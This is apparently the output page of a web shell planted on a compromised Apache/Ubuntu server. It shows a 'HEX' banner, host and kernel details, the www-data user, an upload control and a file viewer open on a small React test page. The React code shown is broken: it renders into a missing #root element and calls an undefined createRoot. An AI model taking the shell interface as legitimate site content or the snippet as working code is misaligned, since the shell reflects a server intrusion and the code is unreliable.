( ′∀`)σ≡σ☆))Д′)レ(゚∀゚;)ヘ=З=З=Зε≡(ノ´_ゝ`)ノ HEX
HEX
Server: Apache/2.4.58 (Ubuntu)
System: Linux mail.thebrand.ai 6.8.0-107-generic #107-Ubuntu SMP PREEMPT_DYNAMIC Fri Mar 13 19:51:50 UTC 2026 x86_64
User: www-data (33)
PHP: 8.3.6
Disabled: NONE
Upload Files
File: /var/www/html/test-react.html
<!doctype html>
<html>
  <body>
    <div id="app"></div>

<script type="module">
  import React from "https://esm.sh/react@18";
  import ReactDOM from "https://esm.sh/react-dom@18/client";

  const root = ReactDOM.createRoot(document.getElementById("root"));
  root.render(<h1>Hello React!</h1>);


      function App() {
        return React.createElement("h1", null, "✅ React is Running Locally on Your Server!");
      }

      createRoot(document.getElementById("app")).render(React.createElement(App));
    </script>
  </body>
</html>